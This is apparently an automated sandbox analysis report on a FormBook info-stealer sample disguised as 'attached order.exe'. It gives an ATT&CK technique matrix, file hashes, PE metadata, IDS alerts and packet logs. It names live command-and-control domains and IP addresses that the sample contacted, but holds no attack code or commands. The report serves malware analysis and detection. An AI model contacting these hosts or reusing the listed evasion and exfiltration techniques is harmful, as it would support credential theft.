                      Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Services File Permissions Weakness | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Services File Permissions Weakness | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 22 Software Packing | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      [Behavior graph: ID 1563709, Sample: attached order.exe, Startdate: 27/11/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      attached order.exe | 34% | ReversingLabs | |
                      attached order.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      www.aktmarket.xyz | 13.248.169.48 | true | true | | unknown
                      iglpg.online | 173.201.189.241 | true | true | | unknown
                      1hong.pels5zqo.shop | 43.163.1.110 | true | true | | unknown
                      www.christinascuties.net | 74.208.236.156 | true | true | | unknown
                      techmiseajour.net | 84.32.84.32 | true | true | | unknown
                      www.golivenow.live | 66.29.149.46 | true | true | | unknown
                      www.gk88top.top | 104.21.7.187 | true | true | | unknown
                      superiorfencing.net | 103.230.159.86 | true | true | | unknown
                      www.techmiseajour.net | unknown | unknown | false | | unknown
                      www.superiorfencing.net | unknown | unknown | false | | unknown
                      www.iglpg.online | unknown | unknown | false | | unknown
                      www.1qcczjvh2.autos | unknown | unknown | false | | unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563709
Start date and time: 2024-11-27 11:26:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: attached order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@8/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 211
• Number of non-executed functions: 287
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: attached order.exe
Time      Type             Description
05:28:08  API Interceptor  1x Sleep call for process: attached order.exe modified
05:29:19  API Interceptor  3330433x Sleep call for process: cacls.exe modified
                                                                                        • 18.190.189.46
                                                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 3.115.252.145
                                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 18.185.133.128
                                                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 13.229.98.210
                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 3.156.3.97
                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 3.67.122.17
                                                                                        https://hmrc.imicampaign.uk/seeemailinfull/EmailServlet?campaignkw=notrack&tid=cc-0_1732616321656385551&signature=B8C7164A14962A622D435A3DBF774C01Get hashmaliciousUnknownBrowse
                                                                                        • 44.227.124.15
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Users\user\Desktop\attached order.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1730
                                                                                        Entropy (8bit):5.351477327467947
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhHxvKHKOGHKnHKuIN:Pq5q12wCYqh6oPtIAeqzhRCqOGqnquIN
                                                                                        MD5:1CE5835BF97CB675CAFC53DA09933212
                                                                                        SHA1:0C6E3F4EDCE2135689BD0A24B24E7147C3BA8C46
                                                                                        SHA-256:70A42D49E0BC6FF6E7F6F554E4759A49278C8DEF3A9D9A01F3452191D498A34D
                                                                                        SHA-512:0F30531AA7340571641BCB79E9B0DC3D14CA5FDD0D0CFF808F2B66C6C6EF49511D49247495A6F8005192FC4617AAA5E1E0D4DB8354434753A8C09B9DB144C5E7
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d
                                                                                        Process:C:\Windows\SysWOW64\cacls.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):135168
                                                                                        Entropy (8bit):1.1142956103012707
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.500595227626125
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:attached order.exe
                                                                                        File size:1'044'992 bytes
                                                                                        MD5:0879125fd7b75f462bc11eaebdb28445
                                                                                        SHA1:54f3cbafcdc1162d30db5167f64d4b98d0ce84c4
                                                                                        SHA256:3a4692716a5ddbc570a1d14328c50b7edf677631b2ac1ea9e99a77aa46de0993
                                                                                        SHA512:c7532f95b4b05f09b03be7986d943cab2cab8899c02c03a626ab4f4c57e13f2d99e099801bafdd9c9451ae0290a63cfcf9154a3d72350949aa86e8674a6952a5
                                                                                        SSDEEP:24576:r3chLC53Vo3h2N4hmXTYJmMc0qBTEWuOAR6uP:bcY53O2G8Xnpdub6uP
                                                                                        TLSH:EE258D9C3210B18FC857C9328954ED74E6616CAA930BD303A1E75DAFBD4E69BDE140F2
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZVFg..............0.................. ........@.. .......................@............@................................
                                                                                        Icon Hash:53084c444c441845
                                                                                        Entrypoint:0x4ff7be
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6746565A [Tue Nov 26 23:14:34 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xff764 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x1520 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x102000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xfd7c4 | 0xfd800 | 2c45d551170cc167813b567573cd2840 | False | 0.7872923600838264 | data | 7.504742855579335 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x100000 | 0x1520 | 0x1600 | 10e766ba7029f8ad9a6b019483bf2ef6 | False | 0.7563920454545454 | data | 6.9770890701268575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x102000 | 0xc | 0x200 | 31b20233458858453320c0cb4e10dcf6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100130 | 0xfbe | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.892803970223325
RT_GROUP_ICON | 0x1010f0 | 0x14 | data | | | 1.05
RT_VERSION | 0x101104 | 0x22c | data | | | 0.49640287769784175
RT_MANIFEST | 0x101330 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-27T11:28:57.522385+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49745 | 74.208.236.156 | 80 | TCP
2024-11-27T11:29:22.565445+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49749 | 84.32.84.32 | 80 | TCP
2024-11-27T11:29:36.291018+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49753 | 13.248.169.48 | 80 | TCP
2024-11-27T11:29:50.011210+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49757 | 66.29.149.46 | 80 | TCP
2024-11-27T11:30:04.014102+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49761 | 173.201.189.241 | 80 | TCP
2024-11-27T11:30:19.723076+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49765 | 43.163.1.110 | 80 | TCP
2024-11-27T11:30:34.386330+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49769 | 104.21.7.187 | 80 | TCP
2024-11-27T11:30:49.772725+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49773 | 103.230.159.86 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Nov 27, 2024 11:29:16.268896103 CET804974784.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:16.269134045 CET4974780192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:16.272559881 CET4974780192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:16.688508034 CET804974784.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:16.688692093 CET804974784.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:18.789793968 CET4974880192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:19.205945015 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.206372976 CET4974880192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:19.209932089 CET4974880192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:19.626429081 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626477003 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626512051 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626540899 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626569033 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626596928 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626626015 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:19.626657963 CET804974884.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:21.726571083 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.144395113 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.144665956 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.147238016 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.564965963 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565191984 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565234900 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565268040 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565356970 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565392017 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565444946 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.565483093 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565517902 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565601110 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565628052 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:22.565649033 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.565696955 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.565989971 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.566653967 CET4974980192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:22.984592915 CET804974984.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:27.753212929 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:27.941153049 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:27.941376925 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:27.944976091 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:28.132105112 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:28.132637024 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:28.132802963 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:29.458491087 CET4975080192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:29.645185947 CET804975013.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.474723101 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:30.662856102 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.663096905 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:30.666505098 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:30.853809118 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.854269981 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:30.854496956 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:32.176713943 CET4975180192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:32.364259958 CET804975113.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.192856073 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.380806923 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.381016970 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.384470940 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.384531975 CET4975280192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:33.571501017 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.571580887 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.571722031 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.571746111 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:33.572251081 CET804975213.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:35.911293983 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.099826097 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.100091934 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.102649927 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.289769888 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.290648937 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.290682077 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:36.291018009 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.291717052 CET4975380192.168.11.2013.248.169.48
                                                                                        Nov 27, 2024 11:29:36.478702068 CET804975313.248.169.48192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.554805040 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:41.723474026 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.723717928 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:41.727457047 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:41.896017075 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.915479898 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.915549994 CET804975466.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:41.915750027 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:43.236747026 CET4975480192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.253066063 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.421818972 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.422112942 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.425600052 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:44.594249010 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.610393047 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.610455036 CET804975566.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:44.610694885 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:45.939295053 CET4975580192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:46.955404997 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.124413967 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.124635935 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.128191948 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.128262997 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:47.297068119 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297172070 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297198057 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297218084 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297239065 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.297375917 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.315011978 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.315057039 CET804975666.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:47.315202951 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:48.642790079 CET4975680192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.658086061 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.826925039 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:49.827138901 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.829678059 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:49.998827934 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:50.010843039 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:50.010857105 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:50.011209965 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:50.011873007 CET4975780192.168.11.2066.29.149.46
                                                                                        Nov 27, 2024 11:29:50.180494070 CET804975766.29.149.46192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.203764915 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.375293970 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.375622988 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.379116058 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.550630093 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729764938 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729849100 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729872942 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.729964972 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730103970 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.730106115 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730133057 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730133057 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:55.730154037 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730170012 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730189085 CET8049758173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:55.730307102 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:56.890012980 CET4975880192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:57.906220913 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.078224897 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.078514099 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.082005024 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.253680944 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448162079 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448220968 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448281050 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448364019 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448446989 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448482037 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.448539972 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.448791981 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448884964 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448946953 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:58.448954105 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.448998928 CET8049759173.201.189.241192.168.11.20
                                                                                        Nov 27, 2024 11:29:58.449124098 CET4975980192.168.11.20173.201.189.241
                                                                                        Nov 27, 2024 11:29:59.592530966 CET4975980192.168.11.20173.201.189.241
